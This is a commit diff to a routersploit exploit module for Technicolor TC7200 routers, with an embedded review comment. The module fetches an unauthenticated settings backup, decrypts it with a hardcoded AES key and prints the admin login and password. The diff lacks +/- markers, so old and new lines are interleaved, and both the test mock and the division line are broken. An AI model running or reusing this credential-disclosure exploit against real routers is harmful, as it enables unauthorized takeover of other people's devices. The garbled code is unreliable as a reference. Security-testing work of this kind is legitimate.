Commit 050bb861 by bgermann Committed by Marcin Bury

tc7200_password_disclosure_v2: fix vulnerability check and wrong pycrypto call (#406)

* Fix vulnerability check in tc7200_password_disclosure_v2

Use an encrypted zero block to identify the binary settings backup data.

* Make tc7200_password_disclosure_v2 compatible with new pycrypto

The decryption routine uses AES in ECB mode, implemented with the pycrypto module. ECB does not involve any initialization vector (IV); however, routersploit passes one that is 16 NUL bytes. Older pycrypto versions just ignored this, but newer versions (at least since 2.6) raise an error when an IV is passed with ECB.

* tc7200_password_disclosure_v2: adapt test to the binary check

* add missing import
parent bc35081d
......@@ -13,6 +13,7 @@ class Exploit(HTTPClient):
"authors": [
"Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)", # vulnerability discovery
"0BuRner", # routersploit module
"Bastian Germann", # improved vulnerability check
],
"references": [
"https://www.exploit-db.com/exploits/40157/",
......@@ -35,10 +36,10 @@ class Exploit(HTTPClient):
)
return None
if response is not None and response.status_code == 200 and "MLog" in response.text:
if response is not None and response.status_code == 200:
print_status("Reading GatewaySettings.bin...")
plain = self.decrypt_backup(response.text)
plain = self.decrypt_backup(response.content)
name, pwd = self.parse_backup(plain)
print_success('Exploit success! login: {}, password: {}'.format(name, pwd))
......@@ -63,7 +64,7 @@ class Exploit(HTTPClient):
def decrypt_backup(backup):
key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
l = (len(backup) / 16) * 16
cipher = AES.new(key, AES.MODE_ECB, b'\x00' * 16)
cipher = AES.new(key, AES.MODE_ECB)
plain = cipher.decrypt(backup[0:l])
return plain
......@@ -74,7 +75,8 @@ class Exploit(HTTPClient):
path="/goform/system/GatewaySettings.bin",
)
if response is not None and response.status_code == 200 and "MLog" in response.text:
encr_zero_block = binascii.unhexlify('F29000B62A499FD0A9F39A6ADD2E7780')
if response is not None and response.status_code == 200 and encr_zero_block in response.content:
return True # target is vulnerable
return False # target is not vulnerable
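Review bot: decrypt_backup still computes the slice length with true division, `l = (len(backup) / 16) * 16`, which under Python 3 yields a float and makes `backup[0:l]` raise TypeError before the corrected `AES.new(key, AES.MODE_ECB)` call is ever exercised; the commit switches the caller to `response.content` (bytes) but leaves this line untouched. Change it to `l = (len(backup) // 16) * 16`, and since `l` is the single-letter name PEP 8 discourages, `block_len` reads better. The decorator above `def decrypt_backup(backup)` lies outside the hunk, so I infer from the missing `self` that this is a staticmethod. The hex constant in check() (the hunk at -74) is duplicated in the test and described as the encrypted zero block; deriving it from `key` in one place, or at least a comment next to `encr_zero_block` stating that relation, would keep the two copies from drifting.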
import binascii
from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosure_v2 import Exploit
def test_check_success(target):
""" Test scenario - successful exploitation """
encrypted_mock = binascii.unhexlify('F29000B62A499FD0A9F39A6ADD2E7780' # encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
+'c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f')
route_mock = target.get_route_mock("/goform/system/GatewaySettings.bin", methods=["GET"])
route_mock.return_value = (
"TEST"
"MLog"
"TEST"
encrypted_mock
)
exploit = Exploit()
......